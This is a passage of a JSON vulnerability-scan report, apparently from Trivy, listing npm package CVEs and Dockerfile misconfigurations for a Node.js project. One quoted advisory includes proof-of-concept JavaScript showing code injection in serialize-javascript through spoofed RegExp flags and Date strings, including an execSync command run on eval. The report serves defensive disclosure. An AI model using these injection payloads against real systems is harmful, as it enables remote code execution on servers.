"PublishedDate": "2026-02-28T02:50:45Z",
"LastModifiedDate": "2026-03-02T16:17:35Z"
},
{
"VulnerabilityID": "CVE-2026-34043",
"PkgID": "serialize-javascript@4.0.0",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@4.0.0"
},
"InstalledVersion": "4.0.0",
"FixedVersion": "7.0.5",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34043",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "serialize-javascript: serialize-javascript: Denial of Service via specially crafted array-like object serialization",
"Description": "Serialize JavaScript to a superset of JSON that includes regular expressions and functions. Prior to version 7.0.5, there is a Denial of Service (DoS) vulnerability caused by CPU exhaustion. When serializing a specially crafted \"array-like\" object (an object that inherits from Array.prototype but has a very large length property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely. This issue has been patched in version 7.0.5.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-400",
"CWE-834"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34043",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-qj8w-gfj5-8c6v",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34043",
"https://www.cve.org/CVERecord?id=CVE-2026-34043"
],
"PublishedDate": "2026-03-31T03:15:58.4Z",
"LastModifiedDate": "2026-04-03T16:53:52.573Z"
},
{
"VulnerabilityID": "GHSA-5c6j-r48x-rmvq",
"PkgID": "serialize-javascript@6.0.2",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@6.0.2"
},
"InstalledVersion": "6.0.2",
"FixedVersion": "7.0.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://github.com/advisories/GHSA-5c6j-r48x-rmvq",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()",
"Description": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" \u2014 injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" \u2014 injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"Severity": "HIGH",
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
}
},
"References": [
"https://github.com/advisories/GHSA-hxcc-f52p-wc94",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq",
"https://nvd.nist.gov/vuln/detail/CVE-2020-7660"
],
"PublishedDate": "2026-02-28T02:50:45Z",
"LastModifiedDate": "2026-03-02T16:17:35Z"
},
{
"VulnerabilityID": "CVE-2026-34043",
"PkgID": "serialize-javascript@6.0.2",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@6.0.2"
},
"InstalledVersion": "6.0.2",
"FixedVersion": "7.0.5",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34043",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "serialize-javascript: serialize-javascript: Denial of Service via specially crafted array-like object serialization",
"Description": "serialize-javascript serializes JavaScript to a superset of JSON that includes regular expressions and functions. Prior to version 7.0.5, there is a Denial of Service (DoS) vulnerability caused by CPU exhaustion. When serializing a specially crafted \"array-like\" object (an object that inherits from Array.prototype but has a very large length property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely. This issue has been patched in version 7.0.5.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-400",
"CWE-834"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34043",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-qj8w-gfj5-8c6v",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34043",
"https://www.cve.org/CVERecord?id=CVE-2026-34043"
],
"PublishedDate": "2026-03-31T03:15:58.4Z",
"LastModifiedDate": "2026-04-03T16:53:52.573Z"
},
{
"VulnerabilityID": "CVE-2026-27601",
"PkgID": "underscore@1.13.6",
"PkgName": "underscore",
"PkgIdentifier": {
"PURL": "pkg:npm/underscore@1.13.6"
},
"InstalledVersion": "1.13.6",
"FixedVersion": "1.13.8",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27601",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Underscore.js: Underscore.js: Denial of Service via recursive data structures in flatten and isEqual functions",
"Description": "Underscore.js is a utility-belt library for JavaScript. Prior to 1.13.8, the _.flatten and _.isEqual functions use recursion without a depth limit. Under very specific conditions, detailed below, an attacker could exploit this in a Denial of Service (DoS) attack by triggering a stack overflow. Untrusted input must be used to create a recursive data structure, for example using JSON.parse with no enforced depth limit. The data structure thus created must be passed to _.flatten or _.isEqual. In the case of _.flatten, the vulnerability can only be exploited if it is possible for a remote client to prepare a data structure that consists of arrays at all levels AND if no finite depth limit is passed as the second argument to _.flatten. In the case of _.isEqual, the vulnerability can only be exploited if there exists a code path in which two distinct data structures submitted by the same remote client are compared using _.isEqual. For example, if a client submits data that are stored in a database, and the same client can later submit another data structure that is then compared to the data saved in the database previously, OR if a client submits a single request but its data are parsed twice, creating two non-identical but equivalent data structures that are then compared. Exceptions originating from the call to _.flatten or _.isEqual as a result of a stack overflow are not caught. This vulnerability is fixed in 1.13.8.",
"Severity": "HIGH",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-27601",
"https://github.com/jashkenas/underscore",
"https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4",
"https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84",
"https://github.com/jashkenas/underscore/issues/3011",
"https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw",
"https://nvd.nist.gov/vuln/detail/CVE-2026-27601",
"https://underscorejs.org/#1.13.8",
"https://underscorejs.org/#flatten",
"https://underscorejs.org/#isEqual",
"https://www.cve.org/CVERecord?id=CVE-2026-27601"
],
"PublishedDate": "2026-03-03T23:15:55.56Z",
"LastModifiedDate": "2026-03-05T21:08:35.32Z"
},
{
"VulnerabilityID": "CVE-2025-30359",
"PkgID": "webpack-dev-server@4.15.2",
"PkgName": "webpack-dev-server",
"PkgIdentifier": {
"PURL": "pkg:npm/webpack-dev-server@4.15.2"
},
"InstalledVersion": "4.15.2",
"FixedVersion": "5.2.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-30359",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "webpack-dev-server: webpack-dev-server information exposure",
"Description": "webpack-dev-server allows users to use webpack with a development server that provides live reloading. Prior to version 5.2.1, webpack-dev-server users' source code may be stolen when they access a malicious web site. Because a request for a classic script made by a script tag is not subject to the same-origin policy, an attacker can inject a malicious script into their site and run it. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code. Version 5.2.1 contains a patch for the issue.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-749"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.9
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-30359",
"https://github.com/webpack/webpack-dev-server",
"https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e",
"https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239",
"https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-4v9v-hfq4-rm2v",
"https://nvd.nist.gov/vuln/detail/CVE-2025-30359",
"https://www.cve.org/CVERecord?id=CVE-2025-30359"
],
"PublishedDate": "2025-06-03T18:15:25.243Z",
"LastModifiedDate": "2025-10-03T01:12:23.03Z"
},
{
"VulnerabilityID": "CVE-2025-30360",
"PkgID": "webpack-dev-server@4.15.2",
"PkgName": "webpack-dev-server",
"PkgIdentifier": {
"PURL": "pkg:npm/webpack-dev-server@4.15.2"
},
"InstalledVersion": "4.15.2",
"FixedVersion": "5.2.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-30360",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "webpack-dev-server: webpack-dev-server information exposure",
"Description": "webpack-dev-server allows users to use webpack with a development server that provides live reloading. Prior to version 5.2.1, webpack-dev-server users' source code may be stolen when they access a malicious web site with a non-Chromium-based browser. The `Origin` header is checked to prevent Cross-site WebSocket hijacking, which was reported as CVE-2018-14732. But webpack-dev-server always allows IP-address `Origin` headers. This allows websites that are served on IP addresses to connect to the WebSocket. An attacker can obtain source code via a method similar to that used to exploit CVE-2018-14732. Version 5.2.1 contains a patch for the issue.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-346"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 6.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 6.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 6.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-30360",
"https://github.com/webpack/webpack-dev-server",
"https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127",
"https://github.com/webpack/webpack-dev-server/commit/5c9378bb01276357d7af208a0856ca2163db188e",
"https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb",
"https://github.com/webpack/webpack-dev-server/commit/d2575ad8dfed9207ed810b5ea0ccf465115a2239",
"https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-9jgg-88mc-972h",
"https://nvd.nist.gov/vuln/detail/CVE-2025-30360",
"https://www.cve.org/CVERecord?id=CVE-2025-30360"
],
"PublishedDate": "2025-06-03T18:15:25.41Z",
"LastModifiedDate": "2025-11-21T18:26:18.64Z"
}
]
},
{
"Target": "Dockerfile",
"Class": "config",
"Type": "dockerfile",
"MisconfSummary": {
"Successes": 23,
"Failures": 1,
"Exceptions": 0
},
"Misconfigurations": [
{
"Type": "Dockerfile Security Check",
"ID": "DS002",
"AVDID": "AVD-DS-0002",
"Title": "Image user should not be 'root'",
"Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.",
"Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument",
"Namespace": "builtin.dockerfile.DS002",
"Query": "data.builtin.dockerfile.DS002.deny",
"Resolution": "Add 'USER <non root user name>' line to the Dockerfile",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds002",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds002"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"Code": {
"Lines": null
}
}
}
]
},
{
"Target": "node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile",
"Class": "config",
"Type": "dockerfile",
"MisconfSummary": {
"Successes": 21,
"Failures": 3,
"Exceptions": 0
},
"Misconfigurations": [
{
"Type": "Dockerfile Security Check",
"ID": "DS001",
"AVDID": "AVD-DS-0001",
"Title": "':latest' tag used",
"Description": "When using a 'FROM' statement you should use a specific tag to avoid uncontrolled behavior when the image is updated.",
"Message": "Specify a tag in the 'FROM' statement for image 'selenium/node-chrome'",
"Namespace": "builtin.dockerfile.DS001",
"Query": "data.builtin.dockerfile.DS001.deny",
"Resolution": "Add a tag to the image in the 'FROM' statement",
"Severity": "MEDIUM",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds001",
"References": [
"https://avd.aquasec.com/misconfig/ds001"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"StartLine": 1,
"EndLine": 1,
"Code": {
"Lines": [
{
"Number": 1,
"Content": "FROM selenium/node-chrome:latest",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[38;5;64mFROM\u001b[0m\u001b[38;5;37m selenium/node-chrome:latest",
"FirstCause": true,
"LastCause": true
}
]
}
}
},
{
"Type": "Dockerfile Security Check",
"ID": "DS002",
"AVDID": "AVD-DS-0002",
"Title": "Image user should not be 'root'",
"Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.",
"Message": "Last USER command in Dockerfile should not be 'root'",
"Namespace": "builtin.dockerfile.DS002",
"Query": "data.builtin.dockerfile.DS002.deny",
"Resolution": "Add 'USER <non root user name>' line to the Dockerfile",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds002",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds002"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"StartLine": 3,
"EndLine": 3,
"Code": {
"Lines": [
{
"Number": 3,
"Content": "USER root",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[38;5;64mUSER\u001b[0m\u001b[38;5;37m root",
"FirstCause": true,
"LastCause": true
}
]
}
}
},
{
"Type": "Dockerfile Security Check",
"ID": "DS017",
"AVDID": "AVD-DS-0017",
"Title": "'RUN <package-manager> update' instruction alone",
"Description": "The instruction 'RUN <package-manager> update' should always be followed by '<package-manager> install' in the same RUN statement.",
"Message": "The instruction 'RUN <package-manager> update' should always be followed by '<package-manager> install' in the same RUN statement.",
"Namespace": "builtin.dockerfile.DS017",
"Query": "data.builtin.dockerfile.DS017.deny",
"Resolution": "Combine the '<package-manager> update' and '<package-manager> install' instructions into a single RUN statement",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds017",
"References": [
"https://docs.docker.com/develop/develop-images/instructions/#run",
"https://avd.aquasec.com/misconfig/ds017"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"StartLine": 5,
"EndLine": 8,
"Code": {
"Lines": [
{
"Number": 5,
"Content": "RUN apt-get update -qqy \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[38;5;64mRUN\u001b[0m apt-get update -qqy \u001b[38;5;124m\\",
"FirstCause": true,
"LastCause": false
},
{
"Number": 6,
"Content": " && rm -rf /var/lib/apt/lists/* /var/cache/apt/* \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m \u001b[38;5;245m&&\u001b[0m rm -rf /var/lib/apt/lists/* /var/cache/apt/* \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 7,
"Content": " && rm /bin/sh && ln -s /bin/bash /bin/sh \\",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m \u001b[38;5;245m&&\u001b[0m rm /bin/sh \u001b[38;5;245m&&\u001b[0m ln -s /bin/bash /bin/sh \u001b[38;5;124m\\",
"FirstCause": false,
"LastCause": false
},
{
"Number": 8,
"Content": " && chown seluser /usr/local",
"IsCause": true,
"Annotation": "",
"Truncated": false,
"Highlighted": "\u001b[0m \u001b[38;5;245m&&\u001b[0m chown seluser /usr/local",
"FirstCause": false,
"LastCause": true
}
]
}
}
}
]
},
{
"Target": "node_modules/jsonpath/Dockerfile",
"Class": "config",
"Type": "dockerfile",
"MisconfSummary": {
"Successes": 23,
"Failures": 1,
"Exceptions": 0
},
"Misconfigurations": [
{
"Type": "Dockerfile Security Check",
"ID": "DS002",
"AVDID": "AVD-DS-0002",
"Title": "Image user should not be 'root'",
"Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.",
"Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument",
"Namespace": "builtin.dockerfile.DS002",
"Query": "data.builtin.dockerfile.DS002.deny",
"Resolution": "Add 'USER <non root user name>' line to the Dockerfile",
"Severity": "HIGH",
"PrimaryURL": "https://avd.aquasec.com/misconfig/ds002",
"References": [
"https://docs.docker.com/develop/develop-images/dockerfile_best-practices/",
"https://avd.aquasec.com/misconfig/ds002"
],
"Status": "FAIL",
"Layer": {},
"CauseMetadata": {
"Provider": "Dockerfile",
"Service": "general",
"Code": {
"Lines": null
}
}
}
]
}
]
}